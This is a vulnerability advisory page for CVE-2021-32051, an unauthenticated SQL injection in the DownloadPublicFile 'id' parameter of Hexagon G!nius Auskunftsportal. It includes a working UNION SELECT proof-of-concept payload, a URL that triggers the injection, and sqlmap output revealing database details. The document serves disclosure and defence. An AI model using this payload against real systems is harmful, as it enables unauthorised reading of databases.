Hexagon G!nius Auskunftsportal SQL Injection

🗓️ 11 May 2021 00:00:00Reported by Marcel KeiffenheimType

packetstorm🔗 packetstormsecurity.com👁 215 Views

Hexagon G!nius Auskunftsportal SQL Injection CVE-2021-32051 allows complete database compromise via the DownloadPublicFile componen

Reporter	Title	Published	Views	Family All 10
0day.today	Hexagon G!nius Auskunftsportal SQL Injection Vulnerability	12 May 202100:00	–	zdt
Circl	CVE-2021-32051	12 May 202108:59	–	circl
CNNVD	Hexagon Intergraph G!NIUS SQL注入漏洞	11 May 202100:00	–	cnnvd
CVE	CVE-2021-32051	14 May 202100:38	–	cve
Cvelist	CVE-2021-32051	14 May 202100:38	–	cvelist
EUVD	EUVD-2021-18916	7 Oct 202500:30	–	euvd
NVD	CVE-2021-32051	14 May 202101:15	–	nvd
OSV	CVE-2021-32051	14 May 202101:15	–	osv
Prion	Sql injection	14 May 202101:15	–	prion
RedhatCVE	CVE-2021-32051	22 May 202521:17	–	redhatcve

`CVE-2021-32051 Hexagon G!nius Auskunftsportal before 5.0.0.0 allows SQL injection via the GiPWorkflow/Service/DownloadPublicFile id parameter.  
  
[Additional Information]  
PoC Payload: id=test' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||  
CHR(107)||CHR(112)||CHR(122)||CHR(113)||CHR(107)||CHR(71)||CHR(98)||CHR(88)||CHR(104)||CHR(102)||CHR(99)||  
CHR(67)||CHR(113)||CHR(109)||CHR(69)||CHR(110)||CHR(67)||CHR(76)||CHR(103)||CHR(84)||CHR(83)||CHR(109)||  
CHR(121)||CHR(84)||CHR(73)||CHR(116)||CHR(79)||CHR(103)||CHR(87)||CHR(84)||CHR(120)||CHR(119)||CHR(75)||  
CHR(76)||CHR(114)||CHR(120)||CHR(103)||CHR(85)||CHR(87)||CHR(112)||CHR(111)||CHR(70)||CHR(108)||CHR(73)||  
CHR(113)||CHR(112)||CHR(113)||CHR(120)||CHR(113),NULL FROM DUAL-- LShX  
  
Result:  
====  
back-end DBMS: Oracle  
banner: 'Oracle Database 19c Standard Edition 2 Release 19.0.0.0.0 - Production'  
current user: 'IPA_ADMIN'  
current database (equivalent to schema on Oracle): 'IPA_ADMIN'  
current user is DBA: False  
database management system users [18]:  
====  
  
  
Impact:  
Complete compromise of the database's data integrity.  
  
Discovery:  
1. Discovered manually  
2. Exploited via sqlmap  
------------------------------------------  
[Vulnerability Type]  
SQL Injection  
------------------------------------------  
[Vendor of Product]  
Hexagon AG  
------------------------------------------  
[Affected Product Code Base]  
G!nius Auskunftsportal - 5.0.0.0 (fixed)  
------------------------------------------  
[Affected Component]  
DownloadPublicFile component  
------------------------------------------  
[Attack Type]  
Remote  
------------------------------------------  
[Impact Information Disclosure]  
true  
------------------------------------------  
[Attack Vectors]  
The web application has a function ("DownloadPublicFile") which facilitates downloads.  
The "id" parameter (used to specify which file is to be downloaded) is vulnerable to SQL injection.  
This SQL injection attack surface allows the Oracle database backend to be accessed and read without authentication by using a "UNION SELECT" payload.  
Accessing the following URL will trigger an Oracle error message:  
https://[affected site root]/GiPWorkflow/Service/DownloadPublicFile?id=DS'  
The apostrophe at the end (Unicode U+0027) interrupts the application's hard-coded SQL query.  
At this point a "UNION SELECT" payload can be used to access any data within the database.  
------------------------------------------  
[Has vendor confirmed or acknowledged the vulnerability?]  
true  
A patch has been developed, released and installed to all known instances of the vulnerability a full six months prior to public disclosure.  
------------------------------------------  
[Discoverer]  
Marcel Keiffenheim  
------------------------------------------  
[Reference]  
https://www.hexagonsafetyinfrastructure.com/products/utilities-and-communications-products/advanced-utility-gis/hexagon-ginius  
`

11 May 2021 00:00Current

0.8Low risk

Vulners AI Score0.8

EPSS0.01107